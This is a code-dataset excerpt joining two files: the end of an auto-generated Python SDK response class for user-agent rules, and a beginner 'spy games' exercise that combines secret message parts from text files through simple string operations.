args['success'] = _dict.get('success')
else:
raise ValueError('Required property \'success\' not present in UseragentRuleResp JSON')
if 'errors' in _dict:
args['errors'] = _dict.get('errors')
else:
raise ValueError('Required property \'errors\' not present in UseragentRuleResp JSON')
if 'messages' in _dict:
args['messages'] = _dict.get('messages')
else:
raise ValueError('Required property \'messages\' not present in UseragentRuleResp JSON')
if 'result' in _dict:
args['result'] = UseragentRuleObject.from_dict(_dict.get('result'))
else:
raise ValueError('Required property \'result\' not present in UseragentRuleResp JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a UseragentRuleResp object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'success') and self.success is not None:
_dict['success'] = self.success
if hasattr(self, 'errors') and self.errors is not None:
_dict['errors'] = self.errors
if hasattr(self, 'messages') and self.messages is not None:
_dict['messages'] = self.messages
if hasattr(self, 'result') and self.result is not None:
_dict['result'] = self.result.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this UseragentRuleResp object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'UseragentRuleResp') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'UseragentRuleResp') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
| 38.884086 | 118 | 0.609792 |
f9fe542a1d659f5f403bee23405a74ad24bd1e37 | 2,518 | py | Python | ga-spy-games/code.py | manthangandhi/dsmp-pre-work | 0cfc899dd27292bf11ad80b8df9de19a0c1723c2 | [
"MIT"
] | null | null | null | ga-spy-games/code.py | manthangandhi/dsmp-pre-work | 0cfc899dd27292bf11ad80b8df9de19a0c1723c2 | [
"MIT"
] | null | null | null | ga-spy-games/code.py | manthangandhi/dsmp-pre-work | 0cfc899dd27292bf11ad80b8df9de19a0c1723c2 | [
"MIT"
] | null | null | null | # --------------
##File path for the file
file_path
#Code starts here
def read_file(path):
file = open(file_path,"r")
sentence = file.readline()
file.close()
return sentence
sample_message = read_file(file_path)
# --------------
#Code starts here
#Function to fuse message
def fuse_msg(message_a,message_b):
#Integer division of two numbers
quot=(int(message_b)//int(message_a))
#Returning the quotient in string format
return str(quot)
#Calling the function to read file
message_1=read_file(file_path_1)
print(message_1)
#Calling the function to read file
message_2=read_file(file_path_2)
#Calling the function 'fuse_msg'
secret_msg_1=fuse_msg(message_1,message_2)
#Printing the secret message
print(secret_msg_1)
#Code ends here
# --------------
#Code starts here
sub = ''
def substitute_msg(message_c):
if message_c == 'Red':
sub = 'Army General'
if message_c == 'Green':
sub = 'Data Scientist'
if message_c == 'Blue':
sub = 'Marine Biologist'
return sub
message_3 = read_file(file_path_3)
print(message_3)
secret_msg_2 = substitute_msg(message_3)
print(secret_msg_2)
# --------------
# File path for message 4 and message 5
file_path_4
file_path_5
#Code starts here
message_4 = read_file(file_path_4)
print(message_4)
message_5 = read_file(file_path_5)
print(message_5)
def compare_msg(message_d, message_e):
a_list = message_d.split()
b_list = message_e.split()
c_list = [i for i in a_list if i not in b_list]
final_msg = " ".join(c_list)
return final_msg
secret_msg_3 = compare_msg(message_4, message_5)
print(secret_msg_3)
# --------------
#Code starts here
message_6 = read_file(file_path_6)
print(message_6)
def extract_msg(message_f):
a_list = message_f.split()
even_word = lambda x : len(x) % 2 == 0
b_list = filter(even_word, a_list)
final_msg = " ".join(b_list)
return final_msg
secret_msg_4 = extract_msg(message_6)
print(secret_msg_4)
# --------------
#Secret message parts in the correct order
message_parts=[secret_msg_3, secret_msg_1, secret_msg_4, secret_msg_2]
final_path= user_data_dir + '/secret_message.txt'
#Code starts here
secret_msg = " ".join(message_parts)
def write_file(secret_msg, path):
file = open(path,"a+")
file.write(secret_msg)
file.close()
write_file(secret_msg, final_path)
print(secret_msg)
| 20.306452 | 71 | 0.664019 |